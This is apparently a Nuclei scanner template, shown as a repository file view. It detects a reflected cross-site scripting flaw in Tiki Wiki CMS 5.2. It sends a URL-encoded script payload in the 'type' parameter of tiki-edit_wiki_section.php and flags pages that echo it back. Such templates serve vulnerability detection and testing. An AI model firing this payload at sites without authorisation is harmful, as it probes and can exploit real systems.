nuclei-templates/vulnerabilities/other/tikiwiki-reflected-xss.yaml

27 lines
672 B
YAML
Raw Normal View History

2020-07-31 17:25:41 +00:00
id: tikiwiki-reflected-xss
info:
name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting
author: madrobot
severity: medium
description: todo
2020-07-31 17:25:41 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
- "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
2020-07-31 17:42:34 +00:00
2020-07-31 17:25:41 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2020-07-31 17:42:34 +00:00
- "<script>alert(31337)</script>"
part: body
- type: word
words:
- "text/html"
part: header